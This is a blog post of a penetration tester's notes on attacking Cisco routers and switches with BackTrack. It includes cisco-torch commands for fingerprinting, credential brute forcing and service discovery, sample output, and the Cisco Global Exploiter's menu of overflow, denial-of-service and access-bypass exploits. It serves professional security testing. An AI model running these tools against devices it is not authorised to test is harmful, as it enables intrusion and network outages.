CISCO Penetration testing, is very interesting topic, but could not find much information so decided to collect information while working on professional assignment, and write article so as to get work done easily in future.
Enumeration is the Key!!!...:) I know there may be much information out but for basic start this will be helpful..!
I will suggest to watch basic videos from Vivek Ramchandran from securitytube.net
Below are simple Notes & IMP commands, which may be helpful.
CISCO IOS Pentesting:
root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -A -t -s -u -n -j -w -z -c -F FILE_NAME
Bruteforce:
root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -b -t -F FILE_NAME
Checking X.X.X.X ...
Tryng cisco:Cisco
Fingerprint: 2552511255251325525324255253311310
Description: Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful
2036: Checking X.X.X.X ...
Fingerprint: 2552511255251325525324255253311310
Description: Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful
2036: Checking X.X.X.X ...
Fingerprint: 2552511255251325525324255253311310
Description: Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful
Sometimes you may need to generate your own password list for brute forcing, for which you can use "crunch" from backtrack...
Password Generator:
root@bt:/pentest/passwords/crunch# ;) You can check MAN Pages for more information on crunch!!
Scan for SSH:
root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -s -F FILE_NAME
1815: Checking X.X.X.X ...
Cisco found by SSH banner SSH-1.88-Cisco-1.20
1812: Checking X.X.X.X ...
Cisco found by SSH banner SSH-1.88-Cisco-1.20
root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -j -F FILE_NAME
1851: Checking X.X.X.X ...
*** Found TFTP server
2730: Checking X.X.X.X ...
*** Found TFTP server
Cisco IOS HTTP Authorization Vulnerability Scan
Scan for NTP:
root@bt# ./cisco-torch.pl -n -F FILE_NAME | grep "Found Cisco remote NTP host"
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X
CGE Cisco Exploiter:
Usage :
perl cge.pl <target> <vulnerability number>
Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
root@bt:/pentest/cisco/cisco-global-exploiter# ./cge.pl Number
Launch Graphical Hydra:
Path : /usr/share/applications
sh -c "xhydra"
open vas vulnerability scanner is an open source scanner similer to nessus which is comercial version of this http://born2hack.hpage.com/open-vas-web-vulnerability-scanner_12672677.html
ReplyDelete